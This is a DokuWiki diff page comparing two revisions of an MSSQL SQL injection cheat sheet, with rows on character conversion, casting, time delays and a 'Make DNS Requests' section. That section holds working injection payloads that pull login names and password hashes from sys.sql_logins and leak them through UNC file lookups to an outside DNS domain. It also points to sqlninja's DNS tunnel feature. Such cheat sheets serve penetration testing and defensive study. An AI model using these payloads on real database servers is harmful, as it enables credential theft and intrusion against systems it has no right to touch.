Wiki

User Tools

Site Tools

Trace: find_what_process_is_holding_a_file_open array_of_objects_using_new_operator override_all_other_styles_by_using_important remove_all_packages_in_a_group identifying_if_c_code_is_for_windows_or_linux class_template_-_array_template perform_a_tcp_null_scan_to_fool_a_firewall find_and_delete_files_after_a_certain_time active_directory_user_management
hacking:sql_injection_cheat_sheet_mssql

Differences

This shows you the differences between two versions of the page.

Link to this comparison view

Both sides previous revisionPrevious revision
Next revision		Previous revision
hacking:sql_injection_cheat_sheet_mssql [2020/04/01 09:41] peterhacking:sql_injection_cheat_sheet_mssql [2020/07/15 09:30] (current) – external edit 127.0.0.1
Line 51: Line 51:
 </code>| </code>|
 |ASCII Value -> Char|SELECT char(0x41) -- returns A| |ASCII Value -> Char|SELECT char(0x41) -- returns A|
-|Char -> ASCII Value|SELECT ascii('A') - returns 65|+|Char -> ASCII Value|SELECT ascii('A'-- returns 65|
 |Casting|<code> |Casting|<code>
 SELECT CAST('1' as int); SELECT CAST('1' as int);
Line 62: Line 62:
 |Time Delay|WAITFOR DELAY '0:0:5' -- pause for 5 seconds| |Time Delay|WAITFOR DELAY '0:0:5' -- pause for 5 seconds|
 |Make DNS Requests|<code> |Make DNS Requests|<code>
-<nowiki>declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000+declare @host varchar(800); select @host = name FROM master..syslogins; exec('master..xp_getfiledetails ''\\' + @host + '\c$\boot.ini'''); -- nonpriv, works on 2000
  
 declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005 declare @host varchar(800); select @host = name + '-' + master.sys.fn_varbintohexstr(password_hash) + '.2.pentestmonkey.net' from sys.sql_logins; exec('xp_fileexist ''\\' + @host + '\c$\boot.ini'''); -- priv, works on 2005
-</nowiki>+
 -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary. -- NB: Concatenation is not allowed in calls to these SPs, hence why we have to use @host. Messy but necessary.
--- Also check out theDNS tunnel feature of [[http://sqlninja.sourceforge.net/sqlninja-howto.html|sqlninja]].+-- Also check out theDNS tunnel feature of [[http://sqlninja.sourceforge.net/sqlninja-howto.html|sqlninja]]
 </code>| </code>|
 |Command Execution|<code> |Command Execution|<code>
Line 95: Line 95:
 tempdb tempdb
 </code>| </code>|
 +
 +----
 +
 +===== References =====
 +
 +https://www.michaelboman.org/books/sql-injection-cheat-sheet-mssql
  
hacking/sql_injection_cheat_sheet_mssql.1585734116.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
Donate Powered by PHP Valid HTML5 Valid CSS Driven by DokuWiki